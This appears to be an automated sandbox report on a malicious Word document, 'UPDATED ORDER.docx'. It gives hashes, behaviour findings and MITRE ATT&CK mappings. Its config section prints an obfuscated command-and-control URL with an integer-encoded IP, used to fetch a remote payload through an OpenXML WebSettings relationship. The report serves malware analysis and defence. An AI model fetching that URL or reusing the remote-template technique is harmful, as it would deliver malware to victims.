Overview

overview

10

Static

static

10

UPDATED ORDER.docx

windows7-x64

8

UPDATED ORDER.docx

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    UPDATED ORDER.docx.zip

  • Size

    7KB

  • Sample

    230216-sq122shg8v

  • MD5

    ed282229775b9e6f07d7663c353684eb

  • SHA1

    f3877603cd65b288d89ea3b848a175e1a31f73bf

  • SHA256

    e2d05d32d5072991f4ecf2e808e70648d98cf019fb49eca37634c510c5736b03

  • SHA512

    646b04afe928ae0434fe0bf90fd531d5277e91afb7c5803fae2b2dfbb9dc9308fa9970c290ac11bd68e8da214b8e16fa1c068c6f47f87bed5944233903daa202

  • SSDEEP

    192:aJeHLmAR4Nh1/8PT3rslmxeBxPME12BUZiYd9VY:CeH54Nh1cslmaPME4BciM9VY

Score
10/10
websettings

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@3118348624/O_O.DOC

Targets

    • Target

      UPDATED ORDER.docx

    • Size

      10KB

    • MD5

      045c9a932ad454a9c226e146d761b284

    • SHA1

      eba9136f2eb1eef380b1dcdd3745f3ddb3631613

    • SHA256

      59087ec2fbf8340268cd3aeeed9e4f3bd107cd2c1852a074f38e3723dfa7cf00

    • SHA512

      19fc83fcdee224b4e64a5b333ce732a1bdbc8c086ac2d41a26e00c77dbf6bc22c34637936d8acf1cac4bc0a67ac3012713f432ce147a6137b13382a57579380b

    • SSDEEP

      192:ScIMmtP5hG/b7XN+eO4DAO+5+5F7Jar/YEChI3nPV:SPXRE7XtO4DA7wtar/YECOnN

    Score
    8/10

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Abuses OpenXML format to download file from external location

    • Executes dropped EXE

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1
T1064

Exploitation for Client Execution

1
T1203

Persistence

Privilege Escalation

Defense Evasion

Scripting

1
T1064

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks